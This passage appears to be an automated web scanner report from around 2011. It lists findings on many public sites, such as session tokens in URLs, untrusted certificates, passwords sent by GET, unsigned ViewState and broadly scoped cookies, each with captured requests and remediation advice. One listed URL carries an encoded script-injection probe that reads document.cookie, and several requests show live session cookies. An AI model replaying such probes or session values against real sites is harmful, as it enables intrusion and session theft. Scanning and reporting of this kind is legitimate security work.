<li><a href="/csl/quickAddBySku.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Order by item#</a>
...[SNIP]...
<li><a href="/account/myAccountDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">My Account</a>
...[SNIP]...
<li><a href="https://www.officedepot.com/catalogrequest/catalogRequestDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Request a Catalog</a>
...[SNIP]...
<li><a href="/purchaseGiftCard.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Gift & Rewards Cards</a>
...[SNIP]...
<li><a href="https://www.officedepot.com/customerservice/customerServiceDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Website Feedback</a>
...[SNIP]...
<li><a href="/customerservice/errata.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Recall Notices</a>
...[SNIP]...
<li><a href="/a/ink-toner-and-ribbons/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Ink Depot</a>
...[SNIP]...
<li><a href="/a/browse/furniture/N=5+917/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Furniture Depot</a>
...[SNIP]...
<li><a href="/a/design-print-and-ship/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Copy & Print Depot</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/christopherlowell.jsp">Christopher Lowell</a>
...[SNIP]...
<li><a href="/a/browse/foray/N=5&cbxRefine=302020/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Foray...</a></li>
<li><a href="/catalog/AZ.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Products A-Z</a>
...[SNIP]...
<li><a href="/a/browse/your-greener-office/N=5+11332/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">GreenerOffice</a>
...[SNIP]...
<li><a href="/catalog/search.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&Ntt=office+products">Office Products</a>
...[SNIP]...
<li><a href="/a/browse/office-supplies/N=5+1676/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Office Supplies</a>
...[SNIP]...
<li><a href="/a/browse/furniture/N=5+917/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Office Furniture</a>
...[SNIP]...
<li><a href="/a/browse/technology/N=5+9021/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Technology</a>
...[SNIP]...
<li><a href="/promo.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0118_product.jsp">Write a Product Review</a>
...[SNIP]...
<li><a href="/ads/displayStoreAds.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?popup=true&redirect=false" target='_blank'>Weekly Ad</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/backtoschool/5percent.jsp" target='_blank'>5% Back to Schools Program</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/creditcard/creditcard.jsp">Apply for Credit Card</a>
...[SNIP]...

9.85. http://www1.whdh.com/features/articles/holiday_helping/BO144709/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144709/

Issue detail

The response contains the following links that appear to contain session tokens:

https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&JServSessionIdr006=a3bz0okdo3.app1a

Request

GET /features/articles/holiday_helping/BO144709/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

9.86. http://www1.whdh.com/features/articles/holiday_helping/BO144719/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144719/

Issue detail

The response contains the following links that appear to contain session tokens:

https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&JServSessionIdr006=a3bz0okdo3.app1a

Request

GET /features/articles/holiday_helping/BO144719/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

9.87. http://www1.whdh.com/features/articles/holiday_helping/BO144727/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144727/

Issue detail

The response contains the following links that appear to contain session tokens:

https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&JServSessionIdr006=a3bz0okdo3.app1a

Request

GET /features/articles/holiday_helping/BO144727/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

9.88. http://www1.whdh.com/features/articles/holiday_helping/BO144733/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144733/

Issue detail

The response contains the following links that appear to contain session tokens:

https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&JServSessionIdr006=a3bz0okdo3.app1a

Request

GET /features/articles/holiday_helping/BO144733/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

10. SSL certificate previous next
There are 3 instances of this issue:

https://acc.newsguy.com/
https://billing.cloudaccess.net/
https://www.cloudaccess.net/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

10.1. https://acc.newsguy.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	acc.newsguy.com
Issued by:	Network Solutions Certificate Authority
Valid from:	Tue Jul 29 19:00:00 CDT 2008
Valid to:	Thu Aug 02 18:59:59 CDT 2012

Certificate chain #1

Issued to:	UTN-USERFirst-Hardware
Issued by:	AddTrust External CA Root
Valid from:	Tue Jun 07 03:09:10 CDT 2005
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	Network Solutions Certificate Authority
Issued by:	UTN-USERFirst-Hardware
Valid from:	Sun Apr 09 19:00:00 CDT 2006
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:	UTN-USERFirst-Hardware
Issued by:	UTN-USERFirst-Hardware
Valid from:	Fri Jul 09 13:10:42 CDT 1999
Valid to:	Tue Jul 09 13:19:22 CDT 2019

10.2. https://billing.cloudaccess.net/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificate:

Issued to:	billing.cloudaccess.net
Issued by:	SecureTrust CA
Valid from:	Thu Feb 18 12:14:32 CST 2010
Valid to:	Fri Feb 18 12:14:32 CST 2011

10.3. https://www.cloudaccess.net/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificate:

Issued to:	www.cloudaccess.net
Issued by:	SecureTrust CA
Valid from:	Thu Feb 18 12:14:14 CST 2010
Valid to:	Fri Feb 18 12:14:14 CST 2011

11. Password field submitted using GET method previous next
There are 2 instances of this issue:

http://www.americascupmedia.com/index.php
http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

11.1. http://www.americascupmedia.com/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.americascupmedia.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.americascupmedia.com/index.php

The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.2. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

The form contains the following password field:

upass

Request

Response

12. ASP.NET ViewState without MAC enabled previous next
There are 5 instances of this issue:

http://beta-ads.ace.advertising.com/
http://p.ace.advertising.com/
http://r1-ads.ace.advertising.com/
http://r1.ace.advertising.com/
http://www.lynda.com/landing/softwaretraining.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

12.1. http://beta-ads.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://beta-ads.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: beta-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:30:13 GMT
Content-Length: 1402
Connection: close
Set-Cookie: A07L=CT; expires=Mon, 21-Feb-2011 22:30:13 GMT; path=/; domain=beta-ads.ace.advertising.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

12.2. http://p.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://p.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: p.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:46:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

12.3. http://r1-ads.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ACID=Bc330012940999670074; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; ROLL=v5Q2V0M9itzqEXE!;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:48:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

12.4. http://r1.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: r1.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:49:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

12.5. http://www.lynda.com/landing/softwaretraining.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lynda.com
Path:	/landing/softwaretraining.aspx

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw4CYMO; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pzpdm555fipjxc55k40s5iaj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pzpdm555fipjxc55k40s5iaj; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:43:19 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:43:19 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:43:19 GMT; path=/
X-Powered-By: ASP.NET
From: 284440-web4
Date: Tue, 25 Jan 2011 04:43:19 GMT
Connection: close
Content-Length: 24612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODk5MTU3Nzc3D2QWBGYPZBYGAgIPFgIeBFRleHQFbTxtZXRhIG5hbWU9IkRlc2NyaXB0aW9uIiBjb250ZW50PSJBd2FyZCB3aW5uaW5nIHRyYWluaW5nLCB0dXRvcmlhbHMgYW5kIGNvdXJzZXMgb24gSm9vbWxhISBmcm9tIGx5bmRhLmNvbSIgLz5kAgMPFgIfAAWyBDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCi8vPCFbQ0RBVEFbDQoJdmFyIGdhSnNIb3N0ID0gKCgiaHR0cHM6IiA9PSBkb2N1bWVudC5sb2NhdGlvbi5wcm90b2NvbCkgPyAiaHR0cHM6Ly9zc2wuIiA6ICJodHRwOi8vd3d3LiIpOw0KCWRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCIlM0NzY3JpcHQgc3JjPSciICsgZ2FKc0hvc3QgKyAiZ29vZ2xlLWFuYWx5dGljcy5jb20vZ2EuanMnIHR5cGU9J3RleHQvamF2YXNjcmlwdCclM0UlM0Mvc2NyaXB0JTNFIikpOw0KLy9dXT4NCjwvc2NyaXB0PjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCi8vPCFbQ0RBVEFbDQp0cnl7DQoJdmFyIHBhZ2VUcmFja2VyPV9nYXQuX2dldFRyYWNrZXIoIlVBLTUxMjg2NS0xIik7DQoJcGFnZVRyYWNrZXIuX3NldERvbWFpbk5hbWUoImx5bmRhLmNvbSIpOw0KCQlwYWdlVHJhY2tlci5fc2V0Q3VzdG9tVmFyKDIsIlJlZGVzaWduVGVzdCIsIkNsYXNzaWNTaXRlIiwyKTsNCglwYWdlVHJhY2tlci5fdHJhY2tQYWdldmlldygpOw0KDQp9Y2F0Y2goZXJyKXt9DQovL11dPg0KPC9zY3JpcHQ+DQpkAhEPFQI6aHR0cDovL2ZpbGVzMi5seW5kYS5jb20vZmlsZXMvbG9sX3VpL2Zhdmljb24uaWNvP2Mtdj0yNDYwNTpodHRwOi8vZmlsZXMyLmx5bmRhLmNvbS9maWxlcy9sb2xfdWkvZmF2aWNvbi5pY28/Yy12PTI0NjA1ZAIBD2QWEAICD2QWAgIDDw8WAh4NQWx0ZXJuYXRlVGV4dAURSm9vbWxhISB0dXRvcmlhbHNkZAIEDw8WAh8ABQdKb29tbGEhZGQCBQ8PFgQfAAUHSm9vbWxhIR4LTmF2aWdhdGVVcmwFM2h0dHA6Ly93d3cubHluZGEuY29tL2hvbWUvVmlld0NvdXJzZXMuYXNweD9scGswPTM3MGRkAgYPDxYCHwIFM2h0dHA6Ly93d3cubHluZGEuY29tL2hvbWUvVmlld0NvdXJzZXMuYXNweD9scGswPTM3MGQWAgIBDw8WAh8ABQdKb29tbGEhZGQCBw8PFgIfAQUYc2lnbiB1cCB0byBsZWFybiBKb29tbGEhZGQCCA8WAh4Hb25jbGljawU3U2hvd1dpbmRvd1ZpZGVvVG91cigtMSx0aGlzLmhyZWYsNDgwLDI3MCk7cmV0dXJuIGZhbHNlO2QCCQ8PFgQfAAUHSm9vbWxhIR8CBTNodHRwOi8vd3d3Lmx5bmRhLmNvbS9ob21lL1ZpZXdDb3Vyc2VzLmFzcHg/bHBrMD0zNzBkZAIKD2QWAgIBD2QWAgILDw8WAh8ABQQyMDExZGRk" />
...[SNIP]...

13. Cookie scoped to parent domain previous next
There are 241 instances of this issue:

http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/
http://news.cnet.com/
http://t.mookie1.com/t/v1/imp
http://www.amazon.com/
http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22
http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22
http://www.amazon.com/b/
http://www.amazon.com/books-used-books-textbooks/b
http://www.amazon.com/dp/0313363153
http://www.amazon.com/dp/0814410960
http://www.amazon.com/dp/B000EFAO1G
http://www.amazon.com/dp/B001AIM6V2
http://www.amazon.com/dp/B0037UT1LY
http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b
http://www.amazon.com/gp/css/homepage.html/x22
http://www.amazon.com/gp/gc/x22
http://www.amazon.com/gp/product/0596804946
http://www.amazon.com/gp/site-directory/x22
http://www.amazon.com/music-rock-classical-pop-jazz/b
http://www.amazon.com/toys/b
http://www.amazon.com/wishlist/x22
http://www.amazon.com/x22
http://www.amazon.com/x22/x3e/x3cli
http://www.aspirationtech.org/
http://www.boats.com/
http://www.careersingear.com/
http://www.carmax.com/
http://www.diigo.com/post
http://www.directstartv.com/
https://www.isc.org/software/inn
http://www.metacafe.com/fplayer/
http://www.myspace.com/Modules/PostTo/Pages/
http://www.myspace.com/netlingo
http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue
http://www.opensource.org/licenses/bsd-license.php
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.packtpub.com/award
http://www.stumbleupon.com/submit
http://www.t-mobile.com/Company/Community.aspx
http://a.tribalfusion.com/i.cid
https://acc.newsguy.com/a/memsubmit.asp
https://acc.newsguy.com/user/-/accnt_billing
https://acc.newsguy.com/user/-/accnt_contact
https://acc.newsguy.com/user/-/accnt_flash
https://acc.newsguy.com/user/-/accnt_history
https://acc.newsguy.com/user/-/customer_referrals
https://acc.newsguy.com/user/-/referrals_cashout
https://acc.newsguy.com/user/accnt_overview
https://acc.newsguy.com/user/accnt_renew
https://acc.newsguy.com/user/accnt_settings
https://acc.newsguy.com/user/accnt_signup_usenet
https://acc.newsguy.com/user/accnt_upgrade
http://action.media6degrees.com/orbserv/hbpix
http://ad.doubleclick.net/click
http://ad.turn.com/server/ads.js
http://ads.adbrite.com/adserver/behavioral-data/8201
http://ads.doclix.com/adserver/CntImprImg
http://ads.pointroll.com/PortalServe/
http://ads.revsci.net/adserver/ako
http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1
http://adserver.teracent.net/tase/ad
http://adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp/vew
https://adwords.google.com/select/Login
http://ak1.abmr.net/is/r1-ads.ace.advertising.com
http://as2.whdh.com/m/m.php/1295906131129/m.gif
http://at.amgdgt.com/ads/
http://b.collective-media.net/seg/cm/de18_1
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/set.aspx
http://bid.openx.net/json
http://bid.openx.net/json
http://bid.openx.net/log
http://blogsearch.google.com/
http://books.google.com/bkshp
http://books.google.com/books
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c7.zedo.com/OzoDB/cutils/R52_9/jsc/305/egc.js
http://c7.zedo.com/bar/v16-401/c5/jsc/gl.js
http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html
http://click.linksynergy.com/fs-bin/click
http://code.google.com/p/swfobject/
http://cspix.media6degrees.com/orbserv/hbpix
http://dave.willfork.com/slrnface/
http://delb.opt.fimserve.com/fimbid/
http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23
http://dp.specificclick.net/
http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json
http://feedburner.google.com/fb/a/mailverify
http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22
http://groups.google.com/group/joomla-commits/topics
http://groups.google.com/groups
http://groups.google.com/grphp
http://hairmakeup.tweetmeme.com/
http://howto.tweetmeme.com/
http://ib.adnxs.com/getuid
http://ib.adnxs.com/mapuid
http://ib.adnxs.com/seg
http://id.google.com/verify/EAAAAKBO9UY0zgnYsHCeZqjfAho.gif
http://idpix.media6degrees.com/orbserv/hbpix
http://il.youtube.com/watch
http://images.google.com/images
http://iphone.tweetmeme.com/
http://js.revsci.net/gateway/gw.js
http://justinbieber.tweetmeme.com/
http://k.collective-media.net/cmadj/cm.martini/
http://khm0.google.com/kh/v/x3d76/x26
http://khm1.google.com/kh/v/x3d76/x26
http://khmdb0.google.com/kh
http://khmdb1.google.com/kh
http://leadback.advertising.com/adcedge/lb
http://loadus.exelator.com/load/
https://maps-api-ssl.google.com/maps
http://maps.google.com/maps
http://maps.google.com/maps/place
http://media.fastclick.net/w/pg
http://media.fastclick.net/w/tre
http://media.fastclick.net/w/win.bid
http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011
http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419
http://mig.nexac.com/2/B3DM/DLX/1@x96
http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3
http://news.google.com/news/story
http://news.google.com/nwshp
http://news.webshots.com/photo/1059414821042998563QWNlxQ/x22
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04
http://pc3.yumenetworks.com/dynamic_btx/118_12345
http://picasaweb.google.com/home
http://picasaweb.google.com/lh/view
http://ping.crowdscience.com/ping.js
http://pix01.revsci.net/H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pix04.revsci.net/D08734/a3/0/3/0.gif
http://pix04.revsci.net/G07610/b3/0/3/1003161/657607877.gif
http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js
http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js
http://pixel.33across.com/ps/
http://pixel.mathtag.com/event/img
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/seg/p-9dsZX-5zhUuTg.js
http://pixel.rubiconproject.com/tap.php
http://r.turn.com/r/bd
http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://rcm.amazon.com/e/cm
http://rd.apmebf.com/w/pg
